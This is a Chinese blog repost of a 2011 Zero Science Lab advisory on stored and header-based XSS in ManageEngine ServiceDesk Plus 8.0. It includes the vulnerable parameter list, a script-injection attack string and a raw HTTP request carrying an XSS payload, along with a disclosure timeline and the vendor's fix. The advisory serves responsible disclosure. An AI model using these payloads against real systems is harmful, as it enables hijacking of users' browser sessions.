ManageEngine的ServiceDesk加8.0多个存储XSS漏洞

Vendor: Zoho Corporation Pvt. Ltd.
Product web page: http://www.manageengine.com
Affected version: 8.0.0 Build 8013 (Enterprise)

Summary: ServiceDesk Plus integrates your help desk requests
and assets to help you manage your IT effectively. It helps
you implement ITIL best practices and troubleshoot IT service
requests faster. ServiceDesk Plus is a highly customizable,
easy-to-implement help desk software.

Desc: The application suffers from multiple stored XSS
vulnerabilities. Input thru several parameters is not
sanitized allowing the attacker to execute HTML code
into user's browser session on the affected site. Also,
couple of HTTP header elements are vulnerable to XSS.

Tested on: Microsoft Windows XP Professional SP3 (English)
           Apache-Coyote/1.1
           Java Servlet 2.4
           Tomcat-5.0.28/JBoss-3.2.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk

Vendor status:

[23.07.2011] Vulnerabilities discovered.
[26.07.2011] Vendor contacted.
[26.07.2011] Vendor replies asking more details.
[26.07.2011] Sent vulnerability details to vendor.
[26.07.2011] Vendor confirms XSS issues assigning Issue ID: SD-39838.
[01.08.2011] Requested status update from vendor.
[02.08.2011] Vendor replies.
[03.08.2011] Working with the vendor.
[08.08.2011] Asked vendor for scheduled patch release date.
[08.08.2011] Vendor replies.
[09.08.2011] Working with the vendor.
[16.08.2011] Vendor releases build 8015 to address these issues.
[23.08.2011] Public security advisory released.

Advisory ID: ZSL-2011-5039
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5039.php

Vendor Advisory: http://www.manageengine.com/products/service-desk/readme-8.0.html#8.7

23.07.2011

----

Stored XSS (post-auth):

Param: reqName (POST)
Scripts: WorkOrder.do, Problems.cc, AddNewProblem.cc, ChangeDetails.cc (http://localhost:8080/common/UpdateField.jsp)

Params: reqName, description, level, priority, category, title, attach (POST)
Script: WorkOrder.do

Params: keywords, comments (POST)
Script: AddSolution.do

Params: supportDetails, contractName, comments (POST)
Script: ContractDef.do

Param: organizationName (POST)
Script: VendorDef.do

Param: COMMENTS (POST)
Script: MarkUnavailability.jsp (MySchedule.do)

Attack string: "><script>alert(1)</script>

--

HTTP Header XSS:

Elements: referer, accept-language
Scripts: HomePage.do, MySchedule.do, WorkOrder.do

------------
GET /HomePage.do HTTP/1.0
Accept: */*
User-Agent: joxy-poxy
Host: localhost:8080
Cookie: JSESSIONID=AD4D28ADDB611A3DE6EAC2C6B4C8808E;JSESSIONIDSSO=B1F6034451E9457EEEF3DA09BA424247
Connection: Close
accept-language: 1<script>alert(1)</script>
Pragma: no-cache
------------

本文固定链接: https://www.unhonker.com/technical/56.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年08月24日发表在 技术文章, 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: ManageEngine的ServiceDesk加8.0多个存储XSS漏洞 | 90' s Blog|关注网络信息安全

ManageEngine的ServiceDesk加8.0多个存储XSS漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!